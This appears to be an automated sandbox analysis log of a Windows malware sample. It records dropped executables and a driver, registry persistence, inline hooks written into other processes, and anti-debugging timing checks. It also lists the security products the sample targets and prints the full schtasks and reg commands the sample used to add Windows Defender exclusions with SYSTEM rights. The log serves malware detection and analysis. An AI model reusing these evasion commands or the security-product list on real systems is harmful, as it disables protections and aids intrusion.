              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeUnpacked PE file: 42.2.byHW9q.exe.2980000.3.unpack
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
              Source: tbcore3U.dll.8.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.8.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.8.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.42.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.42.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.42.drStatic PE information: section name: .mo:
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: 44_2_00632691 push ecx; ret 44_2_006326A4

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\XY3LL0.exeJump to dropped file
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\XY3LL0.exeJump to dropped file
              Source: C:\Users\user\Documents\XY3LL0.exeFile created: C:\Program Files (x86)\byHW9q\byHW9q.exeJump to dropped file
              Source: C:\Users\user\Documents\XY3LL0.exeFile created: C:\Program Files (x86)\byHW9q\tbcore3U.dllJump to dropped file
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeFile created: C:\Program Files (x86)\x736Pg9\tbcore3U.dllJump to dropped file
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeFile created: C:\Program Files (x86)\x736Pg9\QmbK8U.exeJump to dropped file
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

              Boot Survival

              barindex
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Documents\XY3LL0.exeMemory written: PID: 892 base: 7FF9082F0008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeMemory written: PID: 892 base: 7FF90818D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeMemory written: PID: 4456 base: 7FF9082F0008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeMemory written: PID: 4456 base: 7FF90818D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7708 base: EE0005 value: E9 8B 2F 66 76 Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7708 base: 77542F90 value: E9 7A D0 99 89 Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7708 base: F00005 value: E9 8B 2F 64 76 Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7708 base: 77542F90 value: E9 7A D0 9B 89 Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 1052 base: 1430005 value: E9 8B 2F 11 76
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 1052 base: 77542F90 value: E9 7A D0 EE 89
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeMemory written: PID: 1848 base: FB0005 value: E9 8B 2F 59 76
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeMemory written: PID: 1848 base: 77542F90 value: E9 7A D0 A6 89
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7036 base: 750005 value: E9 8B 2F DF 76
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 7036 base: 77542F90 value: E9 7A D0 20 89
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeMemory written: PID: 7820 base: 15C0005 value: E9 8B 2F F8 75
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeMemory written: PID: 7820 base: 77542F90 value: E9 7A D0 07 8A
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 5488 base: 6B0005 value: E9 8B 2F E9 76
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMemory written: PID: 5488 base: 77542F90 value: E9 7A D0 16 89
              Source: C:\Users\user\Documents\XY3LL0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CBE87AA
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CC3183C
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCA1EB4
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CD08092
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CB98B19
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CC3C0AF
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CB0DE34
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 36E4BC8
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 3B501D5
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 3745BE3
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 3758F6F
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 3AA7AA6
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCD82C1
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCACBDE
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CBF080B
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCF91B6
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CBF2089
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C5C7C0E
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C4A87AA
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C55A702
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C45A03F
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCAB056
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCB9F9E
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C5A2F48
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C458B19
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C4B080B
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C5B91B6
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCE6565
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CCF7912
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C4090FC
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C5482C1
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C578092
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C529F9E
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C46080B
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C37DE34
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeAPI/Special instruction interceptor: Address: 6C567912
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CB8F12B
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeAPI/Special instruction interceptor: Address: 6CC58647
              Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
              Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeRDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeRDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F9EC5272230h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
              Source: C:\Users\user\Documents\XY3LL0.exeRDTSC instruction interceptor: First address: 61C6A5 second address: 61C6B3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Documents\XY3LL0.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-14095
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_44-3227
              Source: C:\Users\user\Documents\XY3LL0.exeAPI coverage: 2.7 %
              Source: C:\Users\user\Documents\XY3LL0.exe TID: 1688Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exe TID: 5544Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7012Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 5460Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7804Thread sleep count: 62 > 30Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7804Thread sleep time: -31000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 2068Thread sleep count: 45 > 30Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 5460Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\XY3LL0.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF9A1B8 FindFirstFileExW,7_2_00007FF8FDF9A1B8
              Source: C:\Users\user\Documents\XY3LL0.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\userJump to behavior
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: byHW9q.exe, 0000002A.00000002.3239456656.0000000000D36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Documents\XY3LL0.exeAPI call chain: ExitProcess graph end nodegraph_7-14096
              Source: C:\Users\user\Documents\XY3LL0.exeAPI call chain: ExitProcess graph end nodegraph_7-14439
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400073E0 LdrLoadDll,7_2_00000001400073E0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,7_2_0000000140004630
              Source: C:\Users\user\Documents\XY3LL0.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000001400106B0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400092E0 SetUnhandledExceptionFilter,7_2_00000001400092E0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF91F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF8FDF91F50
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF92630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FDF92630
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF976E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FDF976E0
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: 44_2_00632AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00632AE2
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: 44_2_006310CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_006310CC
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: 44_2_006351FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_006351FB

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Documents\XY3LL0.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeNtProtectVirtualMemory: Indirect: 0x2A6B253Jump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeNtDelayExecution: Indirect: 0x1B94DAJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeNtProtectVirtualMemory: Indirect: 0x2ADB253Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
